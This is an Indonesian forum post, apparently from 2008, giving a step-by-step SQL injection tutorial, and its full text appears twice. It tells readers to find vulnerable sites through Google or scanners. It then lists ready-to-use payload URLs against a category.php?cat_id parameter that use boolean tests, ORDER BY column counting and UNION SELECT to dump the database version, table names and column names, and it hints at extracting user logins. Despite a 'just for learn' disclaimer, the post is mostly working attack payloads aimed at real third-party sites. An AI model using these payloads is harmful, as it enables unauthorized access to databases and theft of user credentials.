OpenProxy
04-08-08, 05:12 PM
Hoayemm ngantukz , bete , kepanasan nintau mo ba apa iseng" maen" mdh"an boleh bljar bersama dgn tomohoners yg laen yg so lebeh paham ,,,
Say Hi dulu sama Biznet & nTc :x
Langsng aja sebenarnya ini tntng SqL injection .... cm bljr jg dr orang mdh"an ;) yang dah ngerti mohon bimbinganna :D
.................................................. ..........................
"category.php?cat_id"
1. Cari Target ..... mo cari bisa sama om google apa lewat scanner :D
http://www.x.com/category.php?cat_id=12
(maaf nama webnya nda di tampilin .. :) )
http://i238.photobucket.com/albums/ff149/donghaee/lqs/1.jpg
2.Mencari True Dan False Pada Target
Masukkan command and 1=1 dan and 1=2
http://www.x.com/category.php?cat_id=12 and 1=1 (True)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/2.jpg
Gambar True
http://www.x.com/category.php?cat_id=12 and 1=2 (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/3.jpg
Gambar False ( heheheheh dapet jg :d )
3.Mencari Jumlah Table Command: order by
Gunakan command order by untuk mencari jumlah table dengan melihat table yang false
http://www.x.com/category.php?cat_id=12 order by 1/*
http://www.x.com/category.php?cat_id=12 order by 2/*
http://www.x.comcategory.php?cat_id=12 order by 3/*
http://www.x.com/category.php?cat_id=12 order by 4/*
http://www.x.com/category.php?cat_id=12 order by 5/*
http://www.x.com/category.php?cat_id=12 order by 6/* (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/4.jpg
Disini berarti jumlah tablenya ada 5
4.Membuktikan jumlah table dengan union select
http://www.x.com/category.php?cat_id=12 union select 1,2,3,4,5/* (True)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/5.jpg
http://www.x.com/category.php?cat_id=12 union select 1,2,3,4,5,6/* (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/6.jpg
5.Mengeluarkan angka angka pada table dengan command –
http://www.x.com/category.php?cat_id=-12 union select 1,2,3,4,5/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/7.jpg
Disini Terlihat angka 2 dan 5, angka” itu dipakai untuk memasukkan sql query
6.Masukkan angka 2 dan 5 untuk melihat sql query dan Version dari Sql
http://www.x.com/category.php?cat_id=-12 union select 1,version(),3,4,database()/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/8.jpg
Versi My Sql 5 : 5.0.45-log
7.Melihat Database mengunakan command information.schema
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 0,1/*
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 1,1/*
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 2,1/*
Note :
limit 0,1/* <-- yang ditambahin ini aja
limit 1,1/*
limit 2,1/*
limit 3,1/*
limit 4,1/* dst……
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 0,1/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/9.jpg
Sekarang melihat kolom dalam table author
http://www.xcom/category.php?cat_id=-12 union select 1,column_name,3,4,5 from information_schema.columns where table_schema=database() limit 0,1/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/10.jpg
hoayemm sampe disini dulu neh ... ngantukz heheheh sebenarnya trang bisa liat jg login" user dll... tinggal tergantung torang mo maenin yg di information mana .. ok mdh"an ngerti .. kl nd ngerti berarti selamat heheheh soalna qt jg pertama nd ngerti hahahahha ..... slnjutnya tinggal di kreasikan aja :D .....
N.b : Jangan Pernah Merusak :D ... just for learn ok...
Mudah"an IT tomohoners bisa tmbah maju ... hoayemmmm maap kl penjelasan sukar di mengerti .. just for share and learn bareng kata hehehehe .....
Muahhh Muahhh muahhhh :"> :"> :"> :"> :"> :"> :">
Say Hi dulu sama Biznet & nTc :x
Langsng aja sebenarnya ini tntng SqL injection .... cm bljr jg dr orang mdh"an ;) yang dah ngerti mohon bimbinganna :D
.................................................. ..........................
"category.php?cat_id"
1. Cari Target ..... mo cari bisa sama om google apa lewat scanner :D
http://www.x.com/category.php?cat_id=12
(maaf nama webnya nda di tampilin .. :) )
http://i238.photobucket.com/albums/ff149/donghaee/lqs/1.jpg
2.Mencari True Dan False Pada Target
Masukkan command and 1=1 dan and 1=2
http://www.x.com/category.php?cat_id=12 and 1=1 (True)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/2.jpg
Gambar True
http://www.x.com/category.php?cat_id=12 and 1=2 (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/3.jpg
Gambar False ( heheheheh dapet jg :d )
3.Mencari Jumlah Table Command: order by
Gunakan command order by untuk mencari jumlah table dengan melihat table yang false
http://www.x.com/category.php?cat_id=12 order by 1/*
http://www.x.com/category.php?cat_id=12 order by 2/*
http://www.x.comcategory.php?cat_id=12 order by 3/*
http://www.x.com/category.php?cat_id=12 order by 4/*
http://www.x.com/category.php?cat_id=12 order by 5/*
http://www.x.com/category.php?cat_id=12 order by 6/* (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/4.jpg
Disini berarti jumlah tablenya ada 5
4.Membuktikan jumlah table dengan union select
http://www.x.com/category.php?cat_id=12 union select 1,2,3,4,5/* (True)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/5.jpg
http://www.x.com/category.php?cat_id=12 union select 1,2,3,4,5,6/* (False)
http://i238.photobucket.com/albums/ff149/donghaee/lqs/6.jpg
5.Mengeluarkan angka angka pada table dengan command –
http://www.x.com/category.php?cat_id=-12 union select 1,2,3,4,5/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/7.jpg
Disini Terlihat angka 2 dan 5, angka” itu dipakai untuk memasukkan sql query
6.Masukkan angka 2 dan 5 untuk melihat sql query dan Version dari Sql
http://www.x.com/category.php?cat_id=-12 union select 1,version(),3,4,database()/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/8.jpg
Versi My Sql 5 : 5.0.45-log
7.Melihat Database mengunakan command information.schema
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 0,1/*
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 1,1/*
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 2,1/*
Note :
limit 0,1/* <-- yang ditambahin ini aja
limit 1,1/*
limit 2,1/*
limit 3,1/*
limit 4,1/* dst……
http://www.x.com/category.php?cat_id=-12 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() limit 0,1/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/9.jpg
Sekarang melihat kolom dalam table author
http://www.xcom/category.php?cat_id=-12 union select 1,column_name,3,4,5 from information_schema.columns where table_schema=database() limit 0,1/*
http://i238.photobucket.com/albums/ff149/donghaee/lqs/10.jpg
hoayemm sampe disini dulu neh ... ngantukz heheheh sebenarnya trang bisa liat jg login" user dll... tinggal tergantung torang mo maenin yg di information mana .. ok mdh"an ngerti .. kl nd ngerti berarti selamat heheheh soalna qt jg pertama nd ngerti hahahahha ..... slnjutnya tinggal di kreasikan aja :D .....
N.b : Jangan Pernah Merusak :D ... just for learn ok...
Mudah"an IT tomohoners bisa tmbah maju ... hoayemmmm maap kl penjelasan sukar di mengerti .. just for share and learn bareng kata hehehehe .....
Muahhh Muahhh muahhhh :"> :"> :"> :"> :"> :"> :">